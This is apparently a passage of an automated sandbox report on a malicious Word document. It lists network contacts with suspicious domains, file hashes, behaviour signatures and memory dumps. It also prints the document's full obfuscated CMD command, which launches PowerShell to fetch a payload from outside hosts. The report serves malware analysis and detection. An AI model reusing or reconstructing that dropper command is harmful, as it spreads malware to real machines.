| US | 8.8.8.8:53 | ww38.michiganbusiness.us | udp |
| US | 76.223.26.96:80 | ww38.michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ingridkaslik.com | udp |
| US | 52.40.237.158:80 | ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | www.ingridkaslik.com | udp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | drdelaluz.com | udp |
| US | 8.8.8.8:53 | milehighffa.com | udp |
| US | 107.180.119.205:80 | milehighffa.com | tcp |
| US | 8.8.8.8:53 | avto-baki.ru | udp |
| US | 172.67.167.121:80 | avto-baki.ru | tcp |
| US | 172.67.167.121:443 | avto-baki.ru | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab9E25.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar9F8F.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e12a317f3dcefc68332ae3d93f73c24d |
| SHA1 | 1c8bd4a35d95b8eed6de082038a4dadce2d93b70 |
| SHA256 | bbf30dbeb15ee9c50d0be93f8890a980fded58335623be16e8da2984e9f7a90d |
| SHA512 | 346232d18c15ab0a5afa61c5139d6d48a83dc950282ba27559340357bd07c4a952f4be18278d479f45fdf833d78a892ede777c94a3ed38b9767971c09636201d |
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 46a497f87cdefd74874806d6e224942e |
| SHA1 | 38bb5573eac2e76fd3a7b9a36fb086c591ed21f3 |
| SHA256 | 4d501b6fd59a960c6bc07be0b00083903bea388d76a18fe8ed33a1aad0b57781 |
| SHA512 | 3bd381f8e8933068ce664f33c1224723404f0e778dff86da243b3b0906feb2b5155c1956f09b902610f53277b3241269a5c2646eb583084e320b4cd5c69cda8e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 14:00
Reported
2024-05-26 14:07
Platform
win10v2004-20240508-en
Max time kernel
130s
Max time network
150s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SYSTEM32\CMD.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 1748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMD.exe |
| PID 1648 wrote to memory of 1748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMD.exe |
| PID 1748 wrote to memory of 4624 | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1748 wrote to memory of 4624 | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\75b5887bf105e8c270a980a1122802d3_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\CMD.exe
CMD /v^ /R" ^S^E^t ^ ^ ^B^W^k^q==^A^AI^A^ACAg^AAIAAC^A^gAA^I^A^AC^A^g^AA^I^A^ACA^g^A^A^IAAC^Ag^AA^IAACA9^BQf^A^s^H^A^oBw^Y^A^QHAh^B^wY^A0HA^7^Aw^aAEGAlBgcA^IGA^7^A^QVAY^E^A^qB^A^JA^AC^AtB^Q^ZA^Q^HA^J^BQLAU^GArB^w^bAY^HA^u^BQSA^sDApAQVAY^EA^qB^A^JAACA^sA^A^a^A^8E^A3^B^A^JA^gCAlBAbAk^G^AGBAZA^EGAvBAbA4G^A^3^B^w^b^AQEA^uA^g^W^A^Y^E^Ay^BA^JAsHA^5^BgcAQHA7BQKAY^E^A^tB^gUA^QC^A^gAgb^Ak^G^A^g^AA^aA8^E^A^3BA^JA^gCA^oB^wYAEG^AlB^gc^A8G^A^mBw^O^AcCAl^BAe^AUG^Au^A^wJA^sC^A^3^B^wQ^A^kG^A^k^A^w^K^AcCAc^B^wJ^AsC^AjBQ^aAw^G^Ai^BQd^A^A^HA6^Ag^d^A^4^GAl^B^AJA0D^AV^B^gR^A^o^GA^kA^w^O^AcC^Aw^AA^OA^Y^DAn^A^A^IA^0^D^AgAwdA^ME^A^pB^A^JAs^DApAw^J^AAE^AnA^A^K^AQ^HA^p^BAb^A^A^HA^TBgLAcC^A^q^B^Q^OAgG^AQBw^L^A^U^H^AyB^gL^A^kGArBQ^YAI^GA^t^A^w^b^AQ^HA^2B^Q^Y^A^8CAv^AgO^AAH^A^0B^A^d^AgGA^AB^gVA^E^DAwA^w^T^AgEAaBQc^A^MGAv^AQ^b^A^8GAj^B^g^LAE^G^AmBgZ^Ag^G^AnB^Q^aA^g^GAlBAbAkG^At^B^w^L^A^8CA^6^A^Ac^AQHA^0B^Aa^AAE^AxAwcAc^D^AR^BwLA0GAv^BwY^A4CA6^BQd^AwG^A^h^B^AbAUGAk^Bgc^AQ^GAv^A^w^L^AoD^Aw^B^AdA^Q^H^A^o^BAQAgD^AvAQbA^8G^A^jB^gLA^sG^Ap^B^A^bAMHAh^Bwa^AQ^GA^pB^gcAcGA^uB^Q^a^A^8C^AvAgO^A^A^HA0BA^d^A^g^GAAB^gNAUE^AC^Bg^a^A^8CA^zBQ^dA^4C^AzBwc^AUG^Au^BQ^a^AMHA1BgYA4GA^hB^wZA^k^G^AoBwYAk^G^A^tBwL^A^8C^A^6^AAcA^QHA^0BAaAcCA^9^AgRA^0GA^SBAJ^AsD^A0Bg^b^A^UG^A^pBA^b^AM^E^AiBQZ^AcF^AuA^AdAUG^A^O^B^A^IAQH^A^jB^Q^ZAoGA^iBw^bA^0C^A^3^BQ^ZA4G^A9A^g^WAY^EAy^BA^J ^e-^ l^l^eh^srewo^p&& f^oR /^l %^e ^in ( ^921 ^-1^ ^0) ^dO s^e^t C^H=!C^H!!^B^W^k^q:~ %^e,1!&& ^I^F %^e =^=^0 C^a^LL %C^H:^~ ^ ^4% "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e 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
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | michiganbusiness.us | udp |
| US | 103.224.212.213:80 | michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ww38.michiganbusiness.us | udp |
| US | 13.248.148.254:80 | ww38.michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ingridkaslik.com | udp |
| US | 52.40.237.158:80 | ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | www.ingridkaslik.com | udp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | 254.148.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.212.224.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.237.40.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drdelaluz.com | udp |
| US | 8.8.8.8:53 | milehighffa.com | udp |
| US | 107.180.119.205:80 | milehighffa.com | tcp |
| US | 8.8.8.8:53 | 173.187.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avto-baki.ru | udp |
| US | 172.67.167.121:80 | avto-baki.ru | tcp |
| US | 172.67.167.121:443 | avto-baki.ru | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.167.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/1648-0-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-1-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-3-0x00007FFCD90ED000-0x00007FFCD90EE000-memory.dmp
memory/1648-4-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-7-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-6-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-5-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-2-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-9-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-8-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-11-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-13-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-14-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-16-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-15-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-12-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-10-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-17-0x00007FFC96870000-0x00007FFC96880000-memory.dmp
memory/1648-18-0x00007FFC96870000-0x00007FFC96880000-memory.dmp
memory/1648-29-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-28-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-30-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upplv43i.vwf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4624-42-0x0000022609570000-0x0000022609592000-memory.dmp
memory/1648-97-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-332-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-333-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCDA838.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |
memory/1648-532-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-555-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-556-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-557-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-554-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-558-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp